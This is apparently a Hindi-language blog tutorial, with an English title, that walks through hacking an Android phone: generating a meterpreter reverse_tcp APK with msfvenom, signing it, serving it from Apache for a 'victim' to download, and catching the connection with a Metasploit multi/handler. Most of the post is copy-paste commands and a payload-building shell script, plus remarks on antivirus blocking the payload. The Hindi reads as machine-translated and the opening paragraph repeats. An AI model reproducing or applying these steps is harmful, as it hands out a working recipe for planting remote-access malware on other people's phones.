Hack an Android device with MSFvenom and Kali Linux

Hack an Android device with MSFvenom and Kali Linux

एंड्रॉइड डिवाइस को हैक करने के लिए अलग-अलग तरीके और टूल हैं, इस पोस्ट में, मैं एमएसएफवेनम पर ध्यान केंद्रित करूंगा ताकि एक एपीके जेनरेट किया जा सके जो लक्षित डिवाइस पर इंस्टॉल किया जाएगा और श्रोता स्थापित करने के लिए मेटास्प्लोइट कंसोल जिसका उपयोग एंड्रॉइड डिवाइस के साथ बातचीत करने के लिए किया जाएगा। स्थापित एपीके के माध्यम से डिवाइस। ध्यान रखें कि उपयोग किया गया पेलोड हर Android संस्करण के साथ का

एंड्रॉइड डिवाइस को हैक करने के लिए अलग-अलग तरीके और टूल हैं, इस पोस्ट में, मैं एमएसएफवेनम पर ध्यान केंद्रित करूंगा ताकि एक एपीके जेनरेट किया जा सके जो लक्षित डिवाइस और मेटास्प्लोइट कंसोल पर स्थापित किया जाएगा।एक श्रोता स्थापित करने के लिए जिसका उपयोग इंस्टॉल किए गए एपीके के माध्यम से डिवाइस के साथ बातचीत करने के लिए किया जाएगा। ध्यान रखें कि उपयोग किया गया पेलोड हर Android संस्करण के साथ काम नहीं करेगा, ज्यादातर हाल ही के संस्करण के साथ। मुख्य उद्देश्य यह दिखाना है कि पेलोड कैसे बनाएं और श्रोता कैसे सेट करें, उसके बाद हमें केवल एक सर्वर बनाने की आवश्यकता है जहां पीड़ित वायरस डाउनलोड करेगा। मुझे इस विषय के बारे में Google पर कई अन्य ट्यूटोरियल मिले लेकिन वे बहुत पुराने हैं और वे आपको उपयोग किए गए काली संस्करण के बारे में भी नहीं बताते हैं। आप सोच सकते हैं कि यह महत्वपूर्ण नहीं है, लेकिन जब मैं एमएसएफवेनम का उपयोग करना सीखना चाह रहा था, तो इस्तेमाल किए गए कई पैरामीटर काम नहीं कर रहे थे। ये रहा एक सरल उदाहरण:

$ msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 R > virus.apk

तो यह पहली जगह गलत क्यों है? यदि हम इस कमांड को अपने टर्मिनल में पेस्ट करते हैं, तो हमें यह त्रुटि मिलती है:

Error: No options

जैसा कि आप देख सकते हैं कि कुछ सही नहीं है, अधिक विशेष रूप से " आर " को पैरामीटर के रूप में पहचाना नहीं गया है, तकनीकी रूप से इसे हमारी एपीके को आउटपुट फ़ाइल के रूप में बनाना चाहिए, लेकिन अगर हम आक्रामक सुरक्षा वेबसाइट पर आधिकारिक दस्तावेज की जांच करते हैं, तो हम स्पष्ट रूप से देख सकते हैं उपयोग करने के लिए सही पैरामीटर " -ओ " है:

msfvenomCommands

इन ट्यूटोरियल्स को लेने के लिए यह सिर्फ एक सरल युक्ति है क्योंकि वे अभी हैं, क्योंकि एक साल बाद वे पहले से ही पुराने हो सकते हैं, यहां तक ​​​​कि मेरे द्वारा बनाए गए इस ट्यूटोरियल को भी। अगर कुछ काम नहीं कर रहा है, तो दस्तावेज़ीकरण की जांच करें ।

आवश्यकताएं

यह स्पष्ट होना चाहिए लेकिन ये आवश्यक उपकरण हैं:

  • काली लिनक्स (उपयोग किया गया संस्करण 2021.1 है )
  • एक एंड्रॉइड डिवाइस (यदि आपके पास एंड्रॉइड फोन नहीं है, तो वीएम या ब्लूस्टैक्स जैसे एमुलेटर का उपयोग करें )

आपने काली लिनक्स पहले ही स्थापित कर लिया है लेकिन आपको सही संस्करण याद नहीं है? कोई समस्या नहीं, टर्मिनल में इस आदेश का प्रयोग करें:

$ lsb_release -a

और आपको निम्न आउटपुट प्राप्त करना चाहिए:

No LSB modules are available.Distributor ID: KaliDescription: Kali GNU/Linux RollingRelease: 2021.1Codename: kali-rolling

पेलोड बनाएँ

टर्मिनल में एक-एक करके 7 अलग-अलग कमांड टाइप करने के बजाय, हम काम करने के लिए बस एक शेल स्क्रिप्ट बना सकते हैं। टर्मिनल खोलें और फ़ाइल बनाने के लिए निम्न आदेश का उपयोग करें:

$ touch createThePayload.sh

स्क्रिप्ट को निष्पादन योग्य बनाएं:

$ chmod +x createThePayload.sh

निम्नलिखित कोड को कॉपी और पेस्ट करें (निश्चित रूप से आपको अपना IP और पोर्ट जैसे 4444 सेट करना होगा ):

##!/bin/sh msfvenom -p android/meterpreter/reverse_tcp LHOST=YOURIP LPORT=YOURPORT -o virus.apk keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000 sudo apt-get install default-jdk -y jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore virus.apk hacked jarsigner -verify -verbose -certs virus.apk sudo apt-get install zipalign -y zipalign -v 4 virus.apk virus_signed.apk

टाइप करें ./createThePayload.sh और स्क्रिप्ट निष्पादित करने के लिए एंटर दबाएं, टर्मिनल में आउटपुट जांचें कि सब कुछ सही है या नहीं।

प्रयुक्त आदेशों के बारे में एक त्वरित स्पष्टीकरण

MSFvenom के साथ हम पेलोड सेट करते हैं, होस्ट जो हमारा आईपी, पोर्ट और आउटपुट " वायरस.एपीके " है।

कुंजी टूल कमांड एक कुंजी और प्रमाणपत्र प्रबंधन उपयोगिता है । हम जनरेट करने के लिए कुंजी स्टोर फ़ाइल सेट करते हैं, हैक की तरह एक उपनाम लेकिन आप जो चाहते हैं उसका उपयोग कर सकते हैं बस इस उपनाम को ध्यान में रखें जब आप jarsigner कमांड का उपयोग कर रहे हों, RSA जैसे एल्गोरिथम, कुंजी का आकार, वैधता।

जावा आर्काइव पर हस्ताक्षर करने और सत्यापित करने के लिए हमें जारसिग्नर का उपयोग करने के लिए दो पैकेज, डिफ़ॉल्ट- जेडीके स्थापित करना होगा, ज़िपलाइन जो एक संग्रह संरेखण उपकरण है जो एंड्रॉइड एप्लिकेशन (एपीके) फ़ाइलों को महत्वपूर्ण अनुकूलन प्रदान करता है। हम टर्मिनल में प्रांप्ट के लिए "हां" के साथ स्वचालित रूप से उत्तर देने के लिए पैरामीटर " -y " सेट करते हैं। हमें प्रमाणपत्र पर हस्ताक्षर करने की आवश्यकता है क्योंकि उचित रूप से हस्ताक्षरित प्रमाणपत्र के बिना Android मोबाइल उपकरणों को ऐप्स इंस्टॉल करने की अनुमति नहीं है। Android डिवाइस केवल हस्ताक्षरित .apk फ़ाइलें इंस्टॉल करते हैं।

सर्वर सेटअप करें

अब एक लक्षित मशीन पर एपीके डाउनलोड करने के लिए, हम अपाचे के साथ एक सर्वर का उपयोग कर सकते हैं , यहां से हमें केवल सही url जाने की आवश्यकता है, जो कि " 192.168.1.2/virus_signed.apk " जैसा कुछ है। स्क्रिप्ट द्वारा बनाए गए APK को “ /var/www/html ” में स्थानांतरित करने के लिए, हमें रूट अनुमतियों की आवश्यकता होती है। जैसे कमांड का उपयोग करने के अलावा:

$ sudo virus_signed.apk /var/www/html/virus_signed.apk

आप निम्न कमांड का उपयोग तब भी कर सकते हैं जब आप जानते हैं कि आप विभिन्न कमांड चला रहे होंगे जिन्हें रूट एक्सेस की आवश्यकता है और उनमें से प्रत्येक को सूडो के साथ नहीं चलाना चाहते हैं:

$ sudo -i

जांचें कि क्या apache2 सेवा इसके साथ चल रही है:

$ service apache2 status

यदि आपको निम्न आउटपुट मिलता है:

● apache2.service - The Apache HTTP Server Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled) Active: inactive (dead) Docs: https://httpd.apache.org/docs/2.4/

इसके साथ सेवा प्रारंभ करें:

$ sudo service apache2 start

यदि हम फ़ायरफ़ॉक्स खोलते हैं और अपनी मशीन का IP टाइप करते हैं (आप ifconfig टाइप करके टर्मिनल के साथ IP प्राप्त कर सकते हैं ), तो हमें डेबियन पेज मिलता है:


यह काम करता है
और अगर हम अपनी एपीके फाइल को वेबसाइट डायरेक्टरी में सर्च करते हैं, तो हम इसे डाउनलोड कर सकते हैं:

डाउनलोड एपीके

 श्रोता सेट करें

और अब हमें अपने श्रोता को msfconsole के साथ सेट करना है , हम शोषण, पेलोड और होस्ट सेट करते हैं। पोर्ट पहले से ही 4444 के रूप में सेट है लेकिन आप इसे बदलते हैं। उसके बाद हम इसे चलाएंगे और हम मोबाइल डिवाइस या एमुलेटर पर एपीके डाउनलोड करेंगे, मेरे मामले में मैंने अपने फोन का इस्तेमाल किया। श्रोता सेट करने के लिए इन चरणों का पालन करें:

  1. एमएसएफ कंसोल प्रारंभ करें :
$ msfconsole
  1. जब कंसोल तैयार हो जाए, तो इस कमांड को टाइप करें (यह स्पष्ट होना चाहिए लेकिन टर्मिनल में " एमएसएफ> " कॉपी न करें):
$ msf > use exploit/multi/handler
  1. होस्ट सेट करें:
$ msf > set lhost TypeYourIPHere
  1. पेलोड सेट करें:
$ msf > set payload android/meterpreter/reverse_tcp
  1. शोषण चलाएं:
$ msf > run

फोन पर एपीके डाउनलोड करें, आपको यह सुनिश्चित करने की आवश्यकता है कि आपकी काली मशीन और आपका एंड्रॉइड डिवाइस एक ही नेटवर्क पर हैं।

आइए कुछ आदेशों का परीक्षण करें

कुछ कमांड काम नहीं करेंगे, लेकिन इस वीडियो का मुख्य उद्देश्य यह दिखाना है कि इस सामान को कैसे काम करना है, आप कभी भी पेलोड बदल सकते हैं या यहां तक ​​कि अपना खुद का पेलोड बना सकते हैं। यहाँ एक त्वरित डेमो है:

 

इस पोस्ट के साथ आप Android के लिए एक पेलोड बनाने, एक सर्वर सेटअप करने और सब कुछ पूरी तरह से काम करने के लिए एक श्रोता बनाने में सक्षम होना चाहिए। जैसा कि आप डेमो में देख सकते हैं, एंटीवायरस हमें एपीके इंस्टॉल करने से रोक रहा है, कुछ मामलों में यह हमारी काली मशीन से कनेक्शन बंद भी कर सकता है। ऐसे अन्य मामले हैं जहां कनेक्शन बंद हो जाएगा, दुर्भाग्य से एक भी समाधान नहीं है इसलिए आपको अलग-अलग दृष्टिकोणों को आजमाने की आवश्यकता होगी। यह जांचने का प्रयास करें कि क्या एपीके बनाने के लिए उपयोग किया जाने वाला आर्किटेक्चर एंड्रॉइड द्वारा उपयोग किया जाता है और निश्चित रूप से एंटीवायरस पेलोड को सही तरीके से काम करने से रोक रहा है या नहीं।